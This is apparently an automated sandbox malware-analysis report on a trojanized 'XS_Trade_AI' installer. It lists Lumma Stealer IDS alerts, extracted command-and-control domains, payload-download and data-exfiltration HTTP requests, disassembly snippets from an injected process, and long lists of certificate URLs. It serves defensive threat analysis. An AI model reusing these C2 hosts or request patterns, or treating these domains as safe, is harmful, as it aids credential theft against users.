      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl21_2_00443720
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx-09A22FB6h]21_2_0043F7E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]21_2_0042E870
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ecx, byte ptr [edi+ebx]21_2_00405820
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov word ptr [eax], cx21_2_0041C8CE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov ecx, eax21_2_0040E8D6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ebx, byte ptr [edx+esi]21_2_0040C960
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov ecx, eax21_2_0040E996
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then jmp eax21_2_0042AA40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1817620Ch]21_2_0042AA60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov word ptr [eax], cx21_2_0042CA72
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov word ptr [eax], cx21_2_0042CA72
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+2BB126CDh]21_2_0043FAD0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov edi, edx21_2_00421B40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp al, 2Eh21_2_0042AC04
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov edi, esi21_2_0041ECDE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ebx, byte ptr [edx]21_2_00437CA0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]21_2_0042DE70
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov dword ptr [esp+3Ch], 595A5B84h21_2_00440E3A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov edi, dword ptr [esp+54h]21_2_0042CEDA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then jmp edx21_2_00442EB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl21_2_00442EB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h21_2_00425F00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx edi, word ptr [edx]21_2_00428F00

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49744 -> 104.21.83.166:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 104.21.83.166:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49748 -> 104.21.83.166:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49750 -> 104.21.83.166:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49743 -> 104.21.83.166:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 104.21.83.166:443
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: faulteyotk.site
      Source: Malware configuration extractorURLs: dilemmadu.site
      Source: Malware configuration extractorURLs: revordirecut.cyou
      Source: Malware configuration extractorURLs: goalyfeastz.site
      Source: Malware configuration extractorURLs: servicedny.site
      Source: Malware configuration extractorURLs: authorisev.site
      Source: Malware configuration extractorURLs: contemteny.site
      Source: Malware configuration extractorURLs: opposezmny.site
      Source: Malware configuration extractorURLs: seallysl.site
      Source: unknownDNS query: name: tinyurl.com
      Source: unknownDNS query: name: tinyurl.com
      Source: Joe Sandbox ViewIP Address: 164.132.58.105 164.132.58.105
      Source: Joe Sandbox ViewIP Address: 104.18.111.161 104.18.111.161
      Source: Joe Sandbox ViewIP Address: 104.18.111.161 104.18.111.161
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /ec75f7fn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: tinyurl.com
      Source: global trafficHTTP traffic detected: GET /55d46ea0c6e974cfc3e82261dac14874a7dd1da6cfe830e2d9f1bdd748695419/raw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: rentry.org
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: revordirecut.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: revordirecut.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: revordirecut.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: revordirecut.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: revordirecut.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1259Host: revordirecut.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 549906Host: revordirecut.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: revordirecut.cyou
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ec75f7fn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: tinyurl.com
      Source: global trafficHTTP traffic detected: GET /55d46ea0c6e974cfc3e82261dac14874a7dd1da6cfe830e2d9f1bdd748695419/raw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: rentry.org
      Source: global trafficHTTP traffic detected: GET /yyttrsu.zip HTTP/1.1Accept: */*User-Agent: InnoDownloadPlugin/1.5Host: dl.jrdesklabs.comConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: tinyurl.com
      Source: global trafficDNS traffic detected: DNS query: rentry.org
      Source: global trafficDNS traffic detected: DNS query: dl.jrdesklabs.com
      Source: global trafficDNS traffic detected: DNS query: revordirecut.cyou
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: revordirecut.cyou
      Source: XS_Trade_AI-newest_release_.exe, 00000000.00000003.1783740961.0000000002510000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828489513.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1830205872.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1789233262.0000000003490000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1904656093.000000007F4F0000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1906019015.000000007F720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1/innosetup/index.htm
      Source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930060595.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1931095614.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016815643.000000000124E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2Assured
      Source: taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016484803.000000000124E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredI
      Source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930060595.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1931095614.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928852381.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927618857.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016484803.000000000124E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
      Source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1931095614.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928852381.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927618857.000000000099D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828839852.0000000003643000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1842719957.000000000018F000.00000004.00000010.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.exeString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828839852.0000000003643000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828839852.0000000003643000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828839852.0000000003643000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1842719957.000000000018F000.00000004.00000010.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.exeString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: taskshosts.exe, 0000000F.00000003.1930060595.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2018370501.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
      Source: taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927618857.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016484803.000000000124E000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016815643.000000000124E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digi
      Source: taskshosts.exe, 00000013.00000003.2015504389.000000000124D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digi_
      Source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930060595.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1931095614.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
      Source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1931095614.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928852381.000000000099D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930060595.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1931095614.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928852381.000000000099D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
      Source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1931095614.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928852381.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927618857.000000000099D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
